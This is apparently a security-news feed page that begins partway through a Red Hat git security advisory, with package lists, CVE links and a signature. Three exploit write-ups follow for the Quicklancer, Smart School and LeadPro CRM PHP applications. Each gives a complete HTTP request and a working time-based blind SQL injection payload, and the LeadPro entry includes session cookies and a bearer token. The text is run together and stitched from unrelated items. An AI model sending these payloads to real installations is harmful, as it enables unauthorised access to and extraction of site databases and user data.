gitk-1.8.3.1-25.el7_9.noarch.rpm  
gitweb-1.8.3.1-25.el7_9.noarch.rpm  
perl-Git-1.8.3.1-25.el7_9.noarch.rpm  
perl-Git-SVN-1.8.3.1-25.el7_9.noarch.rpm

x86_64:  
git-1.8.3.1-25.el7_9.x86_64.rpm  
git-daemon-1.8.3.1-25.el7_9.x86_64.rpm  
git-debuginfo-1.8.3.1-25.el7_9.x86_64.rpm  
git-gnome-keyring-1.8.3.1-25.el7_9.x86_64.rpm  
git-svn-1.8.3.1-25.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
git-1.8.3.1-25.el7_9.src.rpm

noarch:  
perl-Git-1.8.3.1-25.el7_9.noarch.rpm

ppc64:  
git-1.8.3.1-25.el7_9.ppc64.rpm  
git-debuginfo-1.8.3.1-25.el7_9.ppc64.rpm

ppc64le:  
git-1.8.3.1-25.el7_9.ppc64le.rpm  
git-debuginfo-1.8.3.1-25.el7_9.ppc64le.rpm

s390x:  
git-1.8.3.1-25.el7_9.s390x.rpm  
git-debuginfo-1.8.3.1-25.el7_9.s390x.rpm

x86_64:  
git-1.8.3.1-25.el7_9.x86_64.rpm  
git-debuginfo-1.8.3.1-25.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

noarch:  
emacs-git-1.8.3.1-25.el7_9.noarch.rpm  
emacs-git-el-1.8.3.1-25.el7_9.noarch.rpm  
git-all-1.8.3.1-25.el7_9.noarch.rpm  
git-bzr-1.8.3.1-25.el7_9.noarch.rpm  
git-cvs-1.8.3.1-25.el7_9.noarch.rpm  
git-email-1.8.3.1-25.el7_9.noarch.rpm  
git-gui-1.8.3.1-25.el7_9.noarch.rpm  
git-hg-1.8.3.1-25.el7_9.noarch.rpm  
git-instaweb-1.8.3.1-25.el7_9.noarch.rpm  
git-p4-1.8.3.1-25.el7_9.noarch.rpm  
gitk-1.8.3.1-25.el7_9.noarch.rpm  
gitweb-1.8.3.1-25.el7_9.noarch.rpm  
perl-Git-SVN-1.8.3.1-25.el7_9.noarch.rpm

ppc64:  
git-daemon-1.8.3.1-25.el7_9.ppc64.rpm  
git-debuginfo-1.8.3.1-25.el7_9.ppc64.rpm  
git-gnome-keyring-1.8.3.1-25.el7_9.ppc64.rpm  
git-svn-1.8.3.1-25.el7_9.ppc64.rpm

ppc64le:  
git-daemon-1.8.3.1-25.el7_9.ppc64le.rpm  
git-debuginfo-1.8.3.1-25.el7_9.ppc64le.rpm  
git-gnome-keyring-1.8.3.1-25.el7_9.ppc64le.rpm  
git-svn-1.8.3.1-25.el7_9.ppc64le.rpm

s390x:  
git-daemon-1.8.3.1-25.el7_9.s390x.rpm  
git-debuginfo-1.8.3.1-25.el7_9.s390x.rpm  
git-gnome-keyring-1.8.3.1-25.el7_9.s390x.rpm  
git-svn-1.8.3.1-25.el7_9.s390x.rpm

x86_64:  
git-daemon-1.8.3.1-25.el7_9.x86_64.rpm  
git-debuginfo-1.8.3.1-25.el7_9.x86_64.rpm  
git-gnome-keyring-1.8.3.1-25.el7_9.x86_64.rpm  
git-svn-1.8.3.1-25.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
git-1.8.3.1-25.el7_9.src.rpm

noarch:  
perl-Git-1.8.3.1-25.el7_9.noarch.rpm

x86_64:  
git-1.8.3.1-25.el7_9.x86_64.rpm  
git-debuginfo-1.8.3.1-25.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

noarch:  
emacs-git-1.8.3.1-25.el7_9.noarch.rpm  
emacs-git-el-1.8.3.1-25.el7_9.noarch.rpm  
git-all-1.8.3.1-25.el7_9.noarch.rpm  
git-bzr-1.8.3.1-25.el7_9.noarch.rpm  
git-cvs-1.8.3.1-25.el7_9.noarch.rpm  
git-email-1.8.3.1-25.el7_9.noarch.rpm  
git-gui-1.8.3.1-25.el7_9.noarch.rpm  
git-hg-1.8.3.1-25.el7_9.noarch.rpm  
git-instaweb-1.8.3.1-25.el7_9.noarch.rpm  
git-p4-1.8.3.1-25.el7_9.noarch.rpm  
gitk-1.8.3.1-25.el7_9.noarch.rpm  
gitweb-1.8.3.1-25.el7_9.noarch.rpm  
perl-Git-SVN-1.8.3.1-25.el7_9.noarch.rpm

x86_64:  
git-daemon-1.8.3.1-25.el7_9.x86_64.rpm  
git-debuginfo-1.8.3.1-25.el7_9.x86_64.rpm  
git-gnome-keyring-1.8.3.1-25.el7_9.x86_64.rpm  
git-svn-1.8.3.1-25.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-25652  
https://access.redhat.com/security/cve/CVE-2023-29007  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZGzKg9zjgjWX9erEAQhQNQ//QfOqb56Pkppxh/2ftKCQT0rWX4HllcRU  
O+NEKAmDXJKmI2cFDGiGzbhFK2UeEDPBd1lszD+44kOdUNWrJi4OHbWVq0hLVXKM  
qxAJLGV1mIm5mTpBHZh9bJ6hrkpekh8svuEtZcT4Q+ZykeA8cEQX5jpFtUJJqTZd  
tkzx8ijU2Xb3Ufawerogu6Vo8tPle2XD79M6b0Uf34NvDHtyEudyRQseZHZIgMer  
aUkriuvw0MjVLs8Sl5/DKC1PoKm9waTeYVPsovmlNcFD1IllBA6bba2qcsOS2gIb  
BSWhyon8cq4OpDSNhASWVF36U/nM33IPFto1cgiwhapit6HbO2jhqWUQnbrA5hOO  
mkUJrQWylOH6ymIprmVV0yBC3m4NwTcevM7fjdZaeMe4WcHizOCAz7gJ3kYbgd1v  
EZSnXtm5/tenxjFxTn64D1psuEg5dG/qamr51o2RQRpTuW9qJuV22+jMt676fuOr  
V3AAeUi6d+d5TD3dKO5KV3OTn2p9x+OkeXj2+Pn5F4Le2KT+JyJ6MtPh70HbuF4P  
OH6EbN8aLLlVzdIYPOg8TY4/dr7pyqqHK1p4XEnsFbcIHADm6AizDep+3E0TgnbU  
AEphXpmipQRPezqXgk66qNBXL9PM1iwKnGckL76i5/rDK1yW6wCnAq8A0TbkDFq1  
/fL8GIBuo5E=  
=/li4  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3263-01

Quicklancer version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Quicklancer v1.0 - SQL Injection# Date: 2023-05-17# Exploit Author: Ahmet Ümit BAYRAM# Vendor:https://codecanyon.net/item/quicklancer-freelance-marketplace-php-script/39087135# Demo Site: https://quicklancer.bylancer.com# Tested on: Kali Linux# CVE: N/A### Request ###POST /php/user-ajax.php HTTP/1.1Content-Type: application/x-www-form-urlencodedAccept: */*x-requested-with: XMLHttpRequestReferer: https://localhostCookie: sec_session_id=12bcd985abfc52d90489a6b5fd8219b2;quickjob_view_counted=31; Quick_lang=arabicContent-Length: 93Accept-Encoding: gzip,deflate,brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Host: localhostConnection: Keep-aliveaction=searchStateCountry&dataString=deneme### Parameter & Payloads ###Parameter: dataString (POST)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: action=searchStateCountry&dataString=deneme' AND (SELECT 8068FROM (SELECT(SLEEP(5)))qUdx) AND 'nbTo'='nbTo

Quicklancer 1.0 SQL Injection

Smart School version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Smart School v1.0 - SQL Injection# Date: 2023-05-17# Exploit Author: Ahmet Ümit BAYRAM# Vendor: https://codecanyon.net/item/smart-school-school-management-system/19426018# Demo Site: https://demo.smart-school.in# Tested on: Kali Linux# CVE: N/A### Request ###POST /course/filterRecords/ HTTP/1.1Host: localhostCookie: ci_session=dd1bqn8ulsiog4vf7fle5hd4k4fklvveUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101Firefox/102.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 136Origin: https://localhostReferer: https://localhost/course/Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: closesearchdata%5B0%5D%5Btitle%5D=category&searchdata%5B0%5D%5Bsearchfield%5D=online_courses.category_id&searchdata%5B0%5D%5Bsearchvalue%5D=1### Parameter & Payloads ###Parameter: searchdata[0][searchfield] (POST)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload:searchdata[0][title]=category&searchdata[0][searchfield]=online_courses.category_idAND (SELECT 7313 FROM (SELECT(SLEEP(5)))mvaR)--hAHp&searchdata[0][searchvalue]=1

Smart School 1.0 SQL Injection

LeadPro CRM version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: LeadPro CRM v1.0 - SQL Injection# Date: 2023-05-17# Exploit Author: Ahmet Ümit BAYRAM# Vendor: https://codecanyon.net/item/leadifly-lead-call-center-crm/43485578# Demo Site: https://demo.leadifly.in# Tested on: Kali Linux# CVE: N/A### Request ###GET /api/v1/products?fields=id,xid,name,price,product_type,tax_rate,tax_label,logo,logo_url&filters=name%20lk%20%22%25aa%25%22&order=id%20desc&offset=0&limit=10HTTP/1.1Host: localhostCookie:XSRF-TOKEN=eyJpdiI6Ind6QkVPeUZzKzI3SWlqSnhjQksyK1E9PSIsInZhbHVlIjoiNU1FQzBRR3NJaFFMNXVrOFp6Y3puQjdNT3ZKcSsyYzc0Nllkc1ovbkMzRnJueDZWV1lnZzJ2RmRaZFRobmRRSmUzVFpDS3dhNVhVRS84UXQrd1FrWkFIclR4Z0d3UDk2YjdFS0MxN25aVG5sY2loQjFYVkhrRXdOV2lWM0s4Um4iLCJtYWMiOiI2MjBiMTEwYTY5MWE3YjYyZTRjYmU5MWU0ZTcwZjRmNGI5ZjUxNjZjNjFmMjc1ZDAwOTE1ODM3NzA5YzZkMzQzIiwidGFnIjoiIn0%3D;leadifly_session=eyJpdiI6InYyUzVNWkVhVHVrODI2ZTl0a21SNmc9PSIsInZhbHVlIjoiSzNjeDVxYUJRbHZEOVd3Z2I3N2pWa1VrbHdTUUNNSmF6blFEN2E4Q3l5RjJ5WnUxbTdyaFJJN3dCUWhZRklzd3B2OWN5bkZJTnR0RndndGxyNjdRSUp6b2NBV1JhSHFWb211SllzajFkb3JCQmtqSzJEeU9ENDZDWW1jdnF0VHEiLCJtYWMiOiI1YjI1YTdlNjhkMDg4NTQyOGI0ODI0ODI5ZjliNzE0OWExNGUxMWVjYmY2MjM2Y2YyMmNkNjMzYmMzODYwNzE1IiwidGFnIjoiIn0%3DUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101Firefox/102.0Accept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestX-Csrf-Token: kMwvghrsJyPwJ1LGTXnMgMQAtQGA33DzzMYdes6VAuthorization: BearereyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL2RlbW8ubGVhZGlmbHkuaW4vYXBpL3YxL2F1dGgvbG9naW4iLCJpYXQiOjE2ODQzMTk3ODAsImV4cCI6MTY4NDM0MTY4MCwibmJmIjoxNjg0MzE5NzgwLCJqdGkiOiJleGJDV2ZmdWhiWTIzRlNqIiwic3ViIjoiMSIsInBydiI6IjIzYmQ1Yzg5NDlmNjAwYWRiMzllNzAxYzQwMDg3MmRiN2E1OTc2ZjcifQ.0GcDjE6Q3GYg8PUeJQAXtMET6yAjGh1Bj9joRMoqZo8X-Xsrf-Token:eyJpdiI6Ind6QkVPeUZzKzI3SWlqSnhjQksyK1E9PSIsInZhbHVlIjoiNU1FQzBRR3NJaFFMNXVrOFp6Y3puQjdNT3ZKcSsyYzc0Nllkc1ovbkMzRnJueDZWV1lnZzJ2RmRaZFRobmRRSmUzVFpDS3dhNVhVRS84UXQrd1FrWkFIclR4Z0d3UDk2YjdFS0MxN25aVG5sY2loQjFYVkhrRXdOV2lWM0s4Um4iLCJtYWMiOiI2MjBiMTEwYTY5MWE3YjYyZTRjYmU5MWU0ZTcwZjRmNGI5ZjUxNjZjNjFmMjc1ZDAwOTE1ODM3NzA5YzZkMzQzIiwidGFnIjoiIn0=Referer: https://localhost/admin/productSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: close### Parameter & Payloads ###Parameter: filters (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload:fields=id,xid,name,price,product_type,tax_rate,tax_label,logo,logo_url&filters=namelk "%aa%") AND (SELECT 6593 FROM (SELECT(SLEEP(5)))qBNH) AND(8549=8549&order=id desc&offset=0&limit=10

Tag

#linux